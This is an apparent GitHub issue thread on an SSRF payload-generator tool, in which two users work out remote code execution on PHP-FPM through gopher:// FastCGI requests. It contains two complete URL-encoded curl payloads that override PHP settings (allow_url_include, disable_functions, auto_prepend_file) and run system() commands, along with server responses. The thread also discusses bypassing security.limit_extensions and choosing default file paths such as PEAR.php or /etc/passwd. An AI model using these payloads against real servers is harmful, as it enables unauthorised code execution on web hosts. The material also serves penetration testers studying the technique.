New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fastcgi: Clear security.limit_extensions value #6

Closed
mpchadwick opened this Issue Feb 1, 2019 · 9 comments

Comments

Projects
None yet
2 participants
@mpchadwick
Copy link

mpchadwick commented Feb 1, 2019

There's a good chance of finding phar files in standard locations according to their installation guides.

E.g.

Currently I get error below when trying to use with /usr/local/bin/composer

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

Access denied.
5 G%
@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Feb 1, 2019

Hey, if we wanted to look the file which doesn't have permissions, then why don't we first get the RCE through default file location and then try to read the file you want or find the files you want.

@tarunkant tarunkant closed this Feb 4, 2019

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 5, 2019

@tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.

I believe doing this would remove the requirement to know the location of a .php file on the system.

I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.

If if helps I mean something like this:

908d138

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 5, 2019

Hmm I figured out the FCGI_PARAMS format however it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

File not found.
no-%
@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Feb 5, 2019

Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls and in the place of COMMAND you wrote /etc/passwd.
And are we able to unable security.limit_extensions (I think no)?

@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Feb 5, 2019

Btw, you can put the file name /etc/passwd, but it's preferable to put .php extension file(btw, I did put one default file, which will be there always if PHP is installed).

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 6, 2019

@tarunkant thanks for all the follow up here. Just to note, it's not true that /usr/share/php/PEAR.php will always be present (which is why I was seeing it's it's possible to use a file that isn't .php by modifying the security.limit_extensions directive)

[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/php

Unfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions this way.

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 6, 2019

Turns out the file is present on my system, just in a slightly different location.

/usr/share/pear/PEAR.php
@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Feb 6, 2019

Cool, you can also check with /etc/passwd, it will work.

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 6, 2019

You're right. It does work for me.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment